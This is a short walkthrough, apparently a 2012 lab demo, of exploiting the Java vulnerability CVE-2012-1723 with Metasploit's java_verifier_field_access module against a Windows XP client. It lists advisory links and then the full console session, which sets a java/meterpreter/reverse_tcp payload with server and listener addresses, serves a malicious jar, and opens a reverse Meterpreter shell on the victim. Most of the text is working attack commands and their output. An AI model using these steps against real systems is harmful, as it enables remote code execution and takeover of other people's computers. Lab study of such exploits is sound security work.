For details of the vulnerability, see:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1723
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-002752.html
For details of the exploit, see:
http://www.exploit-db.com/exploits/19717/
http://www.metasploit.com/modules/exploit/multi/browser/java_verifier_field_access
Running it in Metasploit
The client is a Windows XP machine running an old version of Java.
msf >
msf > use exploit/multi/browser/java_verifier_field_access
msf exploit(java_verifier_field_access) >
msf exploit(java_verifier_field_access) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(java_verifier_field_access) >
msf exploit(java_verifier_field_access) > set srvhost 1.0.0.80
srvhost => 1.0.0.80
msf exploit(java_verifier_field_access) > set srvport 80
srvport => 80
msf exploit(java_verifier_field_access) > set lhost 1.0.0.80
lhost => 1.0.0.80
msf exploit(java_verifier_field_access) > set lport 8080
lport => 8080
msf exploit(java_verifier_field_access) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 1.0.0.80:8080
[*] Using URL: http://1.0.0.80:80/IlDcdK6w4yfJ
[*] Server started.
msf exploit(java_verifier_field_access) >
Try accessing http://1.0.0.80:80/IlDcdK6w4yfJ from the client.
Success:
msf exploit(java_verifier_field_access) >
[*] 192.168.0.100 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 192.168.0.100 java_verifier_field_access - Generated jar to drop (5483 bytes).
[*] 192.168.0.100 java_verifier_field_access - Sending jar
[*] 192.168.0.100 java_verifier_field_access - Sending jar
[*] Sending stage (30216 bytes) to 192.168.0.100
[*] Meterpreter session 1 opened (1.0.0.80:8080 -> 192.168.0.100:1039) at 2012-07-12 20:31:59 +0900
msf exploit(java_verifier_field_access) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >